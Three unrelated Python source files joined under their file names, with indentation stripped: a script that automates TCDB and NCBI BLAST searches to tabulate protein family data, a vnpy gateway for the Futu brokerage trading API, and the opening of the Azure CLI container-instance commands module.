seconds = int(time.groups()[0])
secs = seconds if seconds < 15 else 10
if(interval >= 15):
interval = 0
print ' waited 15 seconds...'
interval = interval + secs
sleep(secs)
return True
return False
#Code copied from protocol1.py
def loop():
global br
if wait():
br.select_form(nr=0)
br.submit()
loop()
return
def find_optimal():
global br
global alignment
br.open('http://www.tcdb.org/progs/blast.php')
br.select_form(nr=1)
br.form['BLAST'] = ['blastp']
br.form['SEQUENCE'] = alignment
br.form['EXPECT'] = ['1000']
br.form['DESCRIPTIONS'] = ['200']
response1 = br.submit().read()
response1 = response1.split('<pre>')[2]
text = re.split('<a href="/search/result.php\?tc=\d+.\D+.\d+">',response1)
del text[0]
for i in range(0,len(text)):
family = text[i].split('</a>')[0]
#only match substring to tcdb family code
if proteinCode != family[:len(proteinCode)]:
if (i != 0): optimEVal = text[i-1].split('</a>')[2].split('<a href="')[0].strip()
break
nums = optimEVal.split('e')
if(1 < len(nums)):
if(re.match('\W*',nums[0])): nums[0] = '1'
optimEVal = float(nums[0])*(10**float(nums[1]))
else: optimEVal = float(nums[0])
optimEVal = '%.9f' %optimEVal
return optimEVal
def blast(proteinCode):
global eValue
global alignment
global br
browser_init()
#Puts the family code into tcdb.org and search
br.open('http://www.tcdb.org/')
br.select_form(nr=0)
br.form.set_all_readonly(False)
br.form['query'] = proteinCode
br.submit()
if (len(proteinCode.split('.')) < 4):
#Clicks the link containing text "View Proteins beloning to blah"
link = br.click_link(text_regex = "View Proteins belonging to: ")
br.open(link)
#Click on the first subfamily on the subfamily list.
cnt = 0
while True:
link = br.click_link(text_regex = '\d+.\D+.\d.\d.\d', nr= cnt)
response = br.open(link)
# Incase that it is possible to not entering a protein's info page
# after clicking "View proteins", skip the first subfamily and
# go to the next one, etc.
try:
#The expected FASTA page is the link with text "FASTA
# formatted sequence", which contains url regex "fasta.php"
link = br.click_link(url_regex = "fasta.php")
break
except mechanize._mechanize.LinkNotFoundError:
#If the page does not contain "fasta.php", skip to the next
# subfamily
br.back()
cnt = cnt + 1
#click into the FASTA fornatted sequence, then split texts to
# extract the string containing only alignment sequence
sourcePage = br.open(link)
keyLines = sourcePage.read().split('<PRE>')[1]
keyLines = keyLines.split('</PRE>')[0]
keyLines = keyLines.split('\n')
del keyLines[0]
for row in keyLines:
alignment = alignment + row
optimEVal = find_optimal()
print ' Estimate Optimal E-Value (TCDB):',optimEVal,'(e.g. ',float(optimEVal),')'
print ' Using:',eValue
eValue = eValue.replace(' ', '')
#Go to NCBI blast page, enter the alignment found above, select
# "psi-blast" and "5000" max results", then blast
br.open('http://blast.ncbi.nlm.nih.gov/Blast.cgi?PROGRAM=blastp&BLAST_PROGRAMS=blastp&PAGE_TYPE=BlastSearch&SHOW_DEFAULTS=on&LINK_LOC=blasthome')
br.select_form(nr=0)
br.form.set_all_readonly(False)
br.form['SELECTED_PROG_TYPE'] = 'psiBlast'
br.form['RUN_PSIBLAST'] = 'on'
br.form['BLAST_PROGRAMS'] = ['psiBlast']
br.form['QUERY'] = alignment
br.form['I_THRESH'] = eValue
br.form['MAX_NUM_SEQ'] = ['10000']
br.submit()
print " Blasting Off..."
loop()
print " Done.\n"
# To explain this code a little more, it is easier to write the response
# to a html file and submit the file using mechanize parameters, for
# there does not seem to be any inherent support to follow a response
# without a link. In this case, the blast returns a custom source page
# through the CGI script. The only way to submit the content again
# is to hard code the response. As we can see done here.
def iterate():
global br
global tfiles
results = br.response().read()
#results = open('out.html','r').read()
results = results.replace('<! --','<!--')
file = open('out.html','w')
file.write(results)
myres = tempfile.NamedTemporaryFile(mode='w+t',suffix='.html', delete=False)
myres.write(results)
myres.seek(0), myres.flush()
br.open_local_file(myres.name)
myres.close()
# find and select form
formcount=0
for form in br.forms():
if 'name' in form.attrs:
if form.attrs['name'] == 'overview0':
print form.attrs['name']
print 'id={0}'.format(formcount)
br.form = form
break
formcount=formcount+1
br.select_form(nr=formcount)
print br.form
'''
if 'id' in form.attrs:
if form.attrs['id'] == 'smrtBlastForm':
print form.attrs['id']
print 'id={0}'.format(formcount)
br.form = form
break
formcount=formcount+1
if 'name' in form.attrs:
if form.attrs['name'] == 'overview0':
print form.attrs['name']
print 'id={0}'.format(formcount)
br.form = form
break
formcount=formcount+1
'''
br.form.action='http://blast.ncbi.nlm.nih.gov/Blast.cgi'
br.submit()
file = open('out2.html','w')
file.write(br.response().read())
loop()
file = open('out3.html','w')
file.write(br.response().read())
tfiles.append(myres.name)
return
def close():
global tfiles
for item in tfiles:
os.remove(item)
def process_data(process, keyLines, dataQueue, phylumQueue, sequencesQueue, invalidQueue, cutoff):
invalidProteins = 0
minLength = int((len(keyLines)*0.25)*process)
maxLength = int((len(keyLines)*0.25)*(process+1))
counter = 0
#For each link containing the accession number as link
for item in keyLines[minLength:maxLength]:
#Extract the e-value
eValue = (item.split('<td>')[4]).split(' </td')[0]
eValue = float(eValue.strip('\n'))
#Extract the accession number
accessionNum = (item.split('Show report for ')[1]).split('"')[0]
#Use efetch() to fetch info of this accession number, from database
# "protein", return type as GenPept flat file, return mode as xml
# More info: http://www.ncbi.nlm.nih.gov/books/NBK25499/#chapter4.EFetch
try:
handle = Entrez.efetch(db="protein", id=accessionNum, rettype="gp", retmode="xml")
except urllib2.HTTPError:
#Incase that this accession number is not in "protein" database
# (e.g. 3D structure as "Chain A, Potassium Channel (Kcsa)
# Full-Length Fold", accession "1F6G_A"
continue
#read the xml, and extract info: sequence length, domain, phylum,
# and protein name. Filter the proteins by lower cutoff length
record = Entrez.read(handle)
try:
phylum = record[0]['GBSeq_taxonomy'].split(';')[1]
except IndexError:
#Incase that xml does not contain taxonomy info, skip to next
# protein. Cause unknown.
continue
seqLen = int(record[0]['GBSeq_length'])
query_cover = (item.split('<td>')[3]).split('%')[0]
query_cover = int(query_cover.strip('\n'))
if query_cover < cutoff:
invalidQueue.put(1)
continue
try:
length = len(record[0]['GBSeq_other-seqids'])
for i in range(0,length):
if('gi' == record[0]['GBSeq_other-seqids'][i].split('|')[0]):
giNum = record[0]['GBSeq_other-seqids'][i].split('|')[1]
break
except:
print " {0}: Fail to get gi number".format(accessionNum)
continue
try:
fastaSeq = record[0]['GBSeq_sequence']
except:
print " {0}: Failed to record sequence".format(accessionNum)
continue
counter = counter + 1
#Record phylum and phylum name in lists
phylumQueue.put(phylum)
sequencesQueue.put(fastaSeq)
dataQueue.put([eValue,seqLen,giNum,phylum,accessionNum])
def printWrite(str, file):
print str,
file.write(str)
return
def fetch_results(proteinCode,outputseq):
global br
global lo_cutoff
print " fetching results..."
dataList = [] #stores the tuple [e-Value, sequence length, GI Number, phylum] respectively
phylumNameList = [] #list containing all names of phylum, no duplicate
phylumList = [] #list containing all names of phylum, with duplicates
sequences = [] #stores sequences of current family
avgLen = 0 #Average length of sequence
counter = 0
invalidProteins = 0
# Have to use beautiful soup to decode since the result page is not
# that nicely formatted
try:
soup = BeautifulSoup(br.response(), "html.parser")
soup = soup.prettify('utf-8')
except:
print " Trouble soupifying, reading from file directly."
soup = br.response().read()
keyLines = soup.split('Sequences with E-value WORSE than threshold')[0]
#The link containing the accession number contains a tag title "Show
# report for"
keyLines = keyLines.split('Go to alignment for ')
del keyLines[0]
with open(proteinCode + '.txt', 'w') as file:
printWrite(" {0} proteins found in this family. {1} minutes expected to finish\n".format(len(keyLines), round(0.9 * len(keyLines) / 60), -3),file)
m = mp.Manager()
dataQueue = m.Queue()
phylumQueue = m.Queue()
sequencesQueue = m.Queue()
invalidQueue = m.Queue()
jobs = []
for i in range(0,4):
p = mp.Process(target=process_data,args=(i,keyLines,dataQueue,phylumQueue,sequencesQueue,invalidQueue,lo_cutoff))
jobs.append(p)
p.start()
for item in jobs:
item.join()
maxGiLen = 0
while (not(dataQueue.empty()) or not(phylumQueue.empty()) or not(sequencesQueue.empty()) or not (invalidQueue.empty())):
if(not(dataQueue.empty())):
data = dataQueue.get()
if(maxGiLen < len(data[2])): maxGiLen = len(data[2])
dataList.append(data)
if(not(phylumQueue.empty())):
phylum = phylumQueue.get()
phylumList.append(phylum)
if phylum not in phylumNameList:
phylumNameList.append(phylum)
if(not(sequencesQueue.empty())):
sequences.append(sequencesQueue.get())
if(not(invalidQueue.empty())):
invalidProteins = invalidProteins + invalidQueue.get()
#Final outputs
total = 0
for num in dataList:
#compute total sequence length
total = total + num[1]
#divide for average
if(len(dataList) > 0):
avgLen = total/len(dataList)
else:
avgLen = 0
if(outputseq):
if not os.path.exists('./clustalout/'):
os.mkdir('./clustalout/')
f = open('./clustalout/'+proteinCode+'.flat','w')
count = 1
for item in sequences:
f.write('>{0}\n'.format(count))
f.write(item+('\n'))
count = count+1
#compute standard deviation
total = 0
for item in dataList:
total = total + (item[1]-avgLen)**2
if(len(dataList) > 0):
stddev = math.sqrt(total/len(dataList))
else:
stddev = 0
printWrite(" {0} proteins found below the cutoff. Expect {1} proteins.\n".format(invalidProteins,len(keyLines)-invalidProteins),file)
printWrite("\n \tGI number\tAccession Number\tE-Value\tLength\n",file)
for phylumName in phylumNameList:
total = phylumList.count(phylumName)
printWrite('\n {0} from phylum {1} - {2}%\n'.format(total, phylumName,(float(total)/float(len(dataList)))*100), file)
#list used for sorting
phylaData = []
counter = 0
while counter in range(len(dataList)):
if (phylumName == dataList[counter][3]):
phylaData.append(dataList[counter])
counter = counter + 1
phylaData.sort()
for item in phylaData:
printWrite(" {0:<{1}}\t{2}\t\t{3}\t{4}\n".format(item[2],abs(maxGiLen),item[4],item[0],item[1]),file)
#Average Length
printWrite("\n Alignment average length: {0} aa".format(avgLen),file)
printWrite("\n Standard Deviation: {0} aa \n\n".format(stddev),file)
fusionLen4x = 4.0 * avgLen
fusionLen3x = 3.0 * avgLen
fusionLen2x = 2.0 * avgLen
#Records index values on list
fusion4x = []
fusion3x = []
fusion2x = []
counter = 0
while counter in range(len(dataList)):
if dataList[counter][1] >= fusionLen4x:
fusion4x.append(dataList[counter])
elif dataList[counter][1] >= fusionLen3x:
fusion3x.append(dataList[counter])
elif dataList[counter][1] >= fusionLen2x:
fusion2x.append(dataList[counter])
counter = counter + 1
#Sort all fusion proteins by e-value
fusion4x.sort()
fusion3x.sort()
fusion2x.sort()
printWrite(" Potential fusion proteins...\n",file)
printWrite(" Listing GI Numbers of proteins 4x the avg length:\n",file)
for item in fusion4x:
printWrite(" {0};{1}\n".format(item[2],item[0]),file)
printWrite(" Listing GI Numbers of proteins 3x the avg length:\n",file)
for item in fusion3x:
printWrite(" {0};{1}\n".format(item[2], item[0]),file)
printWrite(" Listing GI Numbers of proteins 2x the avg length:\n",file)
for item in fusion2x:
printWrite(" {0};{1}\n".format(item[2], item[0]))
if __name__=='__main__':
#stores indicies of options
optionidx = []
#Default iterate value
numiterate=0
#boolean for outputting seq files
outputseq=0
#If only 2 arguments detected, output usage
if len(sys.argv)<2:
print "Usage:",os.path.basename(__file__),"{[-a[cutoff value %] -i[# iterations] -e[E-Value] -c(write sequences)} [family code...]"
print "Example:",os.path.basename(__file__),"-a30 -c -e0.001 1.A.1 1.A.2 \n\t{-a30},(-e0.001) and (-c) is optional"
quit()
#find command line arg with cutoff
counter = 0
for item in sys.argv:
result = re.match('-a(\d+)',item)
result2 = re.match('-i(\d+)',item)
result3 = re.match('-e(\S+)',item)
result4 = re.match('-c',item)
if(bool(result)):
lo_cutoff = int(result.group(0).split('-a')[1])
optionidx.append(counter)
if(bool(result2)):
numiterate = int(result2.group(0).split('-i')[1])
optionidx.append(counter)
if(bool(result4)):
outputseq = 1
optionidx.append(counter)
if(bool(result3)):
eValue = result3.group(0).split('-e')[1]
optionidx.append(counter)
counter = counter+1
#begin parsing
print "Will search {0} families. Query cover cut off: {1}%.".format(len(sys.argv) - len(optionidx) - 1, lo_cutoff)
cnt = 1
familyCount = 0
while cnt in range(len(sys.argv)):
cnt = cnt + 1
if (cnt-1 in optionidx):
continue
familyCount = familyCount + 1
proteinCode = sys.argv[cnt-1]
print "\nI am working on family #{0}: {1}".format(familyCount, proteinCode)
try:
blast(proteinCode)
except:
print "Error occured on family {0}. So I skip to next family.".format(sys.argv[cnt-1])
continue
#do iterations
print "Iterating %d times:" % numiterate
for i in range(0,numiterate):
print " performing iteration %d," %(i+1)
iterate()
fetch_results(proteinCode,outputseq)
close()
print "\nProgram finished."
|
futuGateway.py
|
# encoding: UTF-8
'''
富途证券的gateway接入
'''
import json
from collections import OrderedDict
from threading import Thread
from time import sleep
from datetime import datetime
from copy import copy
from futuquant import (OpenQuoteContext, OpenHKTradeContext, OpenUSTradeContext,
RET_ERROR, RET_OK,
TrdEnv, TrdSide, OrderType, OrderStatus, ModifyOrderOp,
StockQuoteHandlerBase, OrderBookHandlerBase,
TradeOrderHandlerBase, TradeDealHandlerBase)
from vnpy.trader.vtGateway import *
from vnpy.trader.vtConstant import GATEWAYTYPE_INTERNATIONAL
from vnpy.trader.vtFunction import getJsonPath
# 调用一次datetime,保证初始化
tmp = datetime.strptime('20171123', '%Y%m%d')
# 常量数据映射
productMap = OrderedDict()
productMap[PRODUCT_EQUITY] = 'STOCK'
productMap[PRODUCT_INDEX] = 'IDX'
productMap[PRODUCT_ETF] = 'ETF'
productMap[PRODUCT_WARRANT] = 'WARRANT'
productMap[PRODUCT_BOND] = 'BOND'
directionMap = {}
directionMap[DIRECTION_LONG] = TrdSide.BUY
directionMap[DIRECTION_SHORT] = TrdSide.SELL
directionMapReverse = {v:k for k,v in directionMap.items()}
statusMapReverse = {}
statusMapReverse[OrderStatus.NONE] = STATUS_UNKNOWN
statusMapReverse[OrderStatus.SUBMITTED] = STATUS_NOTTRADED
statusMapReverse[OrderStatus.FILLED_PART] = STATUS_PARTTRADED
statusMapReverse[OrderStatus.FILLED_ALL] = STATUS_ALLTRADED
statusMapReverse[OrderStatus.CANCELLED_ALL] = STATUS_CANCELLED
statusMapReverse[OrderStatus.CANCELLED_PART] = STATUS_CANCELLED
statusMapReverse[OrderStatus.SUBMIT_FAILED] = STATUS_REJECTED
statusMapReverse[OrderStatus.FAILED] = STATUS_REJECTED
statusMapReverse[OrderStatus.DISABLED] = STATUS_CANCELLED
########################################################################
class FutuGateway(VtGateway):
"""富途接口"""
#----------------------------------------------------------------------
def __init__(self, eventEngine, gatewayName='FUTU'):
"""Constructor"""
super(FutuGateway, self).__init__(eventEngine, gatewayName)
self.quoteCtx = None
self.tradeCtx = None
self.host = ''
self.ip = 0
self.market = ''
self.password = ''
self.env = TrdEnv.SIMULATE # 默认仿真交易
self.fileName = self.gatewayName + '_connect.json'
self.filePath = getJsonPath(self.fileName, __file__)
self.tickDict = {}
self.tradeSet = set() # 保存成交编号的集合,防止重复推送
self.qryEnabled = True
self.qryThread = Thread(target=self.qryData)
#----------------------------------------------------------------------
def writeLog(self, content):
"""输出日志"""
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = content
self.onLog(log)
#----------------------------------------------------------------------
def writeError(self, code, msg):
"""输出错误"""
error = VtErrorData()
error.gatewayName = self.gatewayName
error.errorID = code
error.errorMsg = msg
self.onError(error)
#----------------------------------------------------------------------
def connect(self):
"""连接"""
# 载入配置
try:
f = open(self.filePath)
setting = json.load(f)
self.host = setting['host']
self.port = setting['port']
self.market = setting['market']
self.password = setting['password']
self.env = setting['env']
except:
self.writeLog(u'载入配置文件出错')
return
self.connectQuote()
self.connectTrade()
self.qryThread.start()
#----------------------------------------------------------------------
def qryData(self):
"""初始化时查询数据"""
# 等待2秒保证行情和交易接口启动完成
sleep(2.0)
# 查询合约、成交、委托、持仓、账户
self.qryContract()
self.qryTrade()
self.qryOrder()
self.qryPosition()
self.qryAccount()
# 启动循环查询
self.initQuery()
#----------------------------------------------------------------------
def connectQuote(self):
"""连接行情功能"""
self.quoteCtx = OpenQuoteContext(self.host, self.port)
# 继承实现处理器类
class QuoteHandler(StockQuoteHandlerBase):
"""报价处理器"""
gateway = self # 缓存Gateway对象
def on_recv_rsp(self, rsp_str):
ret_code, content = super(QuoteHandler, self).on_recv_rsp(rsp_str)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.processQuote(content)
return RET_OK, content
class OrderBookHandler(OrderBookHandlerBase):
"""订单簿处理器"""
gateway = self
def on_recv_rsp(self, rsp_str):
ret_code, content = super(OrderBookHandler, self).on_recv_rsp(rsp_str)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.processOrderBook(content)
return RET_OK, content
# 设置回调处理对象
self.quoteCtx.set_handler(QuoteHandler())
self.quoteCtx.set_handler(OrderBookHandler())
# 启动行情
self.quoteCtx.start()
self.writeLog(u'行情接口连接成功')
#----------------------------------------------------------------------
def connectTrade(self):
"""连接交易功能"""
# 连接交易接口
if self.market == 'US':
self.tradeCtx = OpenUSTradeContext(self.host, self.port)
else:
self.tradeCtx = OpenHKTradeContext(self.host, self.port)
# 继承实现处理器类
class OrderHandler(TradeOrderHandlerBase):
"""委托处理器"""
gateway = self # 缓存Gateway对象
def on_recv_rsp(self, rsp_str):
ret_code, content = super(OrderHandler, self).on_recv_rsp(rsp_str)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.processOrder(content)
return RET_OK, content
class DealHandler(TradeDealHandlerBase):
"""订单簿处理器"""
gateway = self
def on_recv_rsp(self, rsp_str):
ret_code, content = super(DealHandler, self).on_recv_rsp(rsp_str)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.processDeal(content)
return RET_OK, content
# 只有港股实盘交易才需要解锁
code, data = self.tradeCtx.unlock_trade(self.password)
if code == RET_OK:
self.writeLog(u'交易接口解锁成功')
else:
self.writeLog(u'交易接口解锁失败,原因:%s' %data)
# 设置回调处理对象
self.tradeCtx.set_handler(OrderHandler())
self.tradeCtx.set_handler(DealHandler())
# 启动交易接口
self.tradeCtx.start()
self.writeLog(u'交易接口连接成功')
#----------------------------------------------------------------------
def subscribe(self, subscribeReq):
"""订阅行情"""
for data_type in ['QUOTE', 'ORDER_BOOK']:
code, data = self.quoteCtx.subscribe(subscribeReq.symbol, data_type, True)
if code:
self.writeError(code, u'订阅行情失败:%s' %data)
#----------------------------------------------------------------------
def sendOrder(self, orderReq):
"""发单"""
side = directionMap[orderReq.direction]
priceType = OrderType.NORMAL # 只支持限价单
# 设置价格调整模式为向内调整(即买入调整后价格比原始价格低)
if orderReq.direction == DIRECTION_LONG:
adjustLimit = 0.05
else:
adjustLimit = -0.05
code, data = self.tradeCtx.place_order(orderReq.price, orderReq.volume,
orderReq.symbol, side, priceType,
trd_env=self.env,
adjust_limit=adjustLimit)
if code:
self.writeError(code, u'委托失败:%s' %data)
return ''
for ix, row in data.iterrows():
orderID = str(row['order_id'])
vtOrderID = '.'.join([self.gatewayName, orderID])
return vtOrderID
#----------------------------------------------------------------------
def cancelOrder(self, cancelOrderReq):
"""撤单"""
code, data = self.tradeCtx.modify_order(ModifyOrderOp.CANCEL, cancelOrderReq.orderID,
0, 0, trd_env=self.env)
if code:
self.writeError(code, u'撤单失败:%s' %data)
return
#----------------------------------------------------------------------
def qryContract(self):
"""查询合约"""
for vtProductClass, product in productMap.items():
code, data = self.quoteCtx.get_stock_basicinfo(self.market, product)
if code:
self.writeError(code, u'查询合约信息失败:%s' %data)
return
for ix, row in data.iterrows():
contract = VtContractData()
contract.gatewayName = self.gatewayName
contract.symbol = row['code']
contract.vtSymbol = contract.symbol
contract.name = row['name']
contract.productClass = vtProductClass
contract.size = int(row['lot_size'])
contract.priceTick = 0.001
self.onContract(contract)
self.writeLog(u'合约信息查询成功')
#----------------------------------------------------------------------
def qryAccount(self):
"""查询账户资金"""
code, data = self.tradeCtx.accinfo_query(trd_env=self.env, acc_id=0)
if code:
self.writeError(code, u'查询账户资金失败:%s' %data)
return
for ix, row in data.iterrows():
account = VtAccountData()
account.gatewayName = self.gatewayName
account.accountID = '%s_%s' %(self.gatewayName, self.market)
account.vtAccountID = '.'.join([self.gatewayName, account.accountID])
account.balance = float(row['total_assets'])
account.available = float(row['avl_withdrawal_cash'])
self.onAccount(account)
#----------------------------------------------------------------------
def qryPosition(self):
"""查询持仓"""
code, data = self.tradeCtx.position_list_query(trd_env=self.env, acc_id=0)
if code:
self.writeError(code, u'查询持仓失败:%s' %data)
return
for ix, row in data.iterrows():
pos = VtPositionData()
pos.gatewayName = self.gatewayName
pos.symbol = row['code']
pos.vtSymbol = pos.symbol
pos.direction = DIRECTION_LONG
pos.vtPositionName = '.'.join([pos.vtSymbol, pos.direction])
pos.position = float(row['qty'])
pos.price = float(row['cost_price'])
pos.positionProfit = float(row['pl_val'])
pos.frozen = float(row['qty']) - float(row['can_sell_qty'])
if pos.price < 0: pos.price = 0
if pos.positionProfit > 100000000: pos.positionProfit = 0
self.onPosition(pos)
#----------------------------------------------------------------------
def qryOrder(self):
"""查询委托"""
code, data = self.tradeCtx.order_list_query("", trd_env=self.env)
if code:
self.writeError(code, u'查询委托失败:%s' %data)
return
self.processOrder(data)
self.writeLog(u'委托查询成功')
#----------------------------------------------------------------------
def qryTrade(self):
"""查询成交"""
code, data = self.tradeCtx.deal_list_query(self.env)
if code:
self.writeError(code, u'查询成交失败:%s' %data)
return
self.processDeal(data)
self.writeLog(u'成交查询成功')
#----------------------------------------------------------------------
def close(self):
"""关闭"""
if self.quoteCtx:
self.quoteCtx.close()
if self.tradeCtx:
self.tradeCtx.close()
#----------------------------------------------------------------------
def initQuery(self):
"""初始化连续查询"""
if self.qryEnabled:
# 需要循环的查询函数列表
self.qryFunctionList = [self.qryAccount, self.qryPosition]
self.qryCount = 0 # 查询触发倒计时
self.qryTrigger = 2 # 查询触发点
self.qryNextFunction = 0 # 上次运行的查询函数索引
self.startQuery()
#----------------------------------------------------------------------
def query(self, event):
"""注册到事件处理引擎上的查询函数"""
self.qryCount += 1
if self.qryCount > self.qryTrigger:
# 清空倒计时
self.qryCount = 0
# 执行查询函数
function = self.qryFunctionList[self.qryNextFunction]
function()
# 计算下次查询函数的索引,如果超过了列表长度,则重新设为0
self.qryNextFunction += 1
if self.qryNextFunction == len(self.qryFunctionList):
self.qryNextFunction = 0
#----------------------------------------------------------------------
def startQuery(self):
"""启动连续查询"""
self.eventEngine.register(EVENT_TIMER, self.query)
#----------------------------------------------------------------------
def setQryEnabled(self, qryEnabled):
"""设置是否要启动循环查询"""
self.qryEnabled = qryEnabled
#----------------------------------------------------------------------
def processQuote(self, data):
"""报价推送"""
for ix, row in data.iterrows():
symbol = row['code']
tick = self.tickDict.get(symbol, None)
if not tick:
tick = VtTickData()
tick.symbol = symbol
tick.vtSymbol = tick.symbol
tick.gatewayName = self.gatewayName
self.tickDict[symbol] = tick
tick.date = row['data_date'].replace('-', '')
tick.time = row['data_time']
tick.datetime = datetime.strptime(' '.join([tick.date, tick.time]), '%Y%m%d %H:%M:%S')
tick.openPrice = row['open_price']
tick.highPrice = row['high_price']
tick.lowPrice = row['low_price']
tick.preClosePrice = row['prev_close_price']
tick.lastPrice = row['last_price']
tick.volume = row['volume']
if 'price_spread' in row:
spread = row['price_spread']
tick.upperLimit = tick.lastPrice + spread * 10
tick.lowerLimit = tick.lastPrice - spread * 10
newTick = copy(tick)
self.onTick(newTick)
#----------------------------------------------------------------------
def processOrderBook(self, data):
"""订单簿推送"""
symbol = data['code']
tick = self.tickDict.get(symbol, None)
if not tick:
tick = VtTickData()
tick.symbol = symbol
tick.vtSymbol = tick.symbol
tick.gatewayName = self.gatewayName
self.tickDict[symbol] = tick
d = tick.__dict__
for i in range(5):
bidData = data['Bid'][i]
askData = data['Ask'][i]
n = i + 1
d['bidPrice%s' %n] = bidData[0]
d['bidVolume%s' %n] = bidData[1]
d['askPrice%s' %n] = askData[0]
d['askVolume%s' %n] = askData[1]
if tick.datetime:
newTick = copy(tick)
self.onTick(newTick)
#----------------------------------------------------------------------
def processOrder(self, data):
"""处理委托推送"""
for ix, row in data.iterrows():
# 如果状态是已经删除,则直接忽略
if row['order_status'] == OrderStatus.DELETED:
continue
print(row['order_status'])
order = VtOrderData()
order.gatewayName = self.gatewayName
order.symbol = row['code']
order.vtSymbol = order.symbol
order.orderID = str(row['order_id'])
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
order.price = float(row['price'])
order.totalVolume = float(row['qty'])
order.tradedVolume = float(row['dealt_qty'])
order.orderTime = row['create_time'].split(' ')[-1]
order.status = statusMapReverse.get(row['order_status'], STATUS_UNKNOWN)
order.direction = directionMapReverse[row['trd_side']]
self.onOrder(order)
#----------------------------------------------------------------------
def processDeal(self, data):
"""处理成交推送"""
for ix, row in data.iterrows():
tradeID = str(row['deal_id'])
if tradeID in self.tradeSet:
continue
self.tradeSet.add(tradeID)
trade = VtTradeData()
trade.gatewayName = self.gatewayName
trade.symbol = row['code']
trade.vtSymbol = trade.symbol
trade.tradeID = tradeID
trade.vtTradeID = '.'.join([self.gatewayName, trade.tradeID])
trade.orderID = row['order_id']
trade.vtOrderID = '.'.join([self.gatewayName, trade.orderID])
trade.price = float(row['price'])
trade.volume = float(row['qty'])
trade.direction = directionMapReverse[row['trd_side']]
trade.tradeTime = row['create_time'].split(' ')[-1]
self.onTrade(trade)
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=too-few-public-methods,no-self-use,too-many-locals,line-too-long,unused-argument
import errno
try:
import msvcrt
except ImportError:
# Not supported for Linux machines.
pass
import platform
import select
import shlex
import signal
import sys
import threading
import time
try:
import termios
import tty
except ImportError:
# Not supported for Windows machines.
pass
import websocket
import yaml
from knack.log import get_logger
from knack.prompting import prompt_pass, prompt, NoTTYException
from knack.util import CLIError
from azure.mgmt.containerinstance.models import (AzureFileVolume, Container, ContainerGroup, ContainerGroupNetworkProtocol,
ContainerPort, ImageRegistryCredential, IpAddress, Port, ResourceRequests,
ResourceRequirements, Volume, VolumeMount, ContainerExecRequestTerminalSize,
GitRepoVolume, LogAnalytics, ContainerGroupDiagnostics, ContainerGroupNetworkProfile,
ContainerGroupIpAddressType, ResourceIdentityType, ContainerGroupIdentity)
from azure.cli.core.util import sdk_no_wait
from ._client_factory import (cf_container_groups, cf_container, cf_log_analytics_workspace,
cf_log_analytics_workspace_shared_keys, cf_resource, cf_network)
logger = get_logger(__name__)
WINDOWS_NAME = 'Windows'
SERVER_DELIMITER = '.'
ACR_SERVER_DELIMITER = '.azurecr.io'
AZURE_FILE_VOLUME_NAME = 'azurefile'
SECRETS_VOLUME_NAME = 'secrets'
GITREPO_VOLUME_NAME = 'gitrepo'
MSI_LOCAL_ID = '[system]'
def list_containers(client, resource_group_name=None):
"""List all container groups in a resource group. """
if resource_group_name is None:
return client.list()
return client.list_by_resource_group(resource_group_name)
def get_container(client, resource_group_name, name):
"""Show details of a container group. """
return client.get(resource_group_name, name)
def delete_container(client, resource_group_name, name, **kwargs):
"""Delete a container group. """
return client.delete(resource_group_name, name)
# pylint: disable=too-many-statements
def create_container(cmd,
resource_group_name,
name=None,
image=None,
location=None,
cpu=1,
memory=1.5,
restart_policy='Always',
ports=None,
protocol=None,
os_type='Linux',
ip_address=None,
dns_name_label=None,
command_line=None,
environment_variables=None,
secure_environment_variables=None,
registry_login_server=None,
registry_username=None,
registry_password=None,
azure_file_volume_share_name=None,
azure_file_volume_account_name=None,
azure_file_volume_account_key=None,
azure_file_volume_mount_path=None,
log_analytics_workspace=None,
log_analytics_workspace_key=None,
vnet=None,
vnet_name=None,
vnet_address_prefix='10.0.0.0/16',
subnet=None,
subnet_address_prefix='10.0.0.0/24',
network_profile=None,
gitrepo_url=None,
gitrepo_dir='.',
gitrepo_revision=None,
gitrepo_mount_path=None,
secrets=None,
secrets_mount_path=None,
file=None,
assign_identity=None,
identity_scope=None,
identity_role='Contributor',
no_wait=False):
"""Create a container group. """
if file:
return _create_update_from_file(cmd.cli_ctx, resource_group_name, name, location, file, no_wait)
if not name:
raise CLIError("error: the --name/-n argument is required unless specified with a passed in file.")
if not image:
raise CLIError("error: the --image argument is required unless specified with a passed in file.")
ports = ports or [80]
protocol = protocol or ContainerGroupNetworkProtocol.tcp
container_resource_requirements = _create_resource_requirements(cpu=cpu, memory=memory)
image_registry_credentials = _create_image_registry_credentials(registry_login_server=registry_login_server,
registry_username=registry_username,
registry_password=registry_password,
image=image)
command = shlex.split(command_line) if command_line else None
volumes = []
mounts = []
azure_file_volume = _create_azure_file_volume(azure_file_volume_share_name=azure_file_volume_share_name,
azure_file_volume_account_name=azure_file_volume_account_name,
azure_file_volume_account_key=azure_file_volume_account_key)
azure_file_volume_mount = _create_azure_file_volume_mount(azure_file_volume=azure_file_volume,
azure_file_volume_mount_path=azure_file_volume_mount_path)
if azure_file_volume:
volumes.append(azure_file_volume)
mounts.append(azure_file_volume_mount)
secrets_volume = _create_secrets_volume(secrets)
secrets_volume_mount = _create_secrets_volume_mount(secrets_volume=secrets_volume,
secrets_mount_path=secrets_mount_path)
if secrets_volume:
volumes.append(secrets_volume)
mounts.append(secrets_volume_mount)
diagnostics = None
tags = {}
if log_analytics_workspace and log_analytics_workspace_key:
log_analytics = LogAnalytics(
workspace_id=log_analytics_workspace, workspace_key=log_analytics_workspace_key)
diagnostics = ContainerGroupDiagnostics(
log_analytics=log_analytics
)
elif log_analytics_workspace and not log_analytics_workspace_key:
diagnostics, tags = _get_diagnostics_from_workspace(
cmd.cli_ctx, log_analytics_workspace)
if not diagnostics:
raise CLIError('Log Analytics workspace "' + log_analytics_workspace + '" not found.')
elif not log_analytics_workspace and log_analytics_workspace_key:
raise CLIError('"--log-analytics-workspace-key" requires "--log-analytics-workspace".')
gitrepo_volume = _create_gitrepo_volume(gitrepo_url=gitrepo_url, gitrepo_dir=gitrepo_dir, gitrepo_revision=gitrepo_revision)
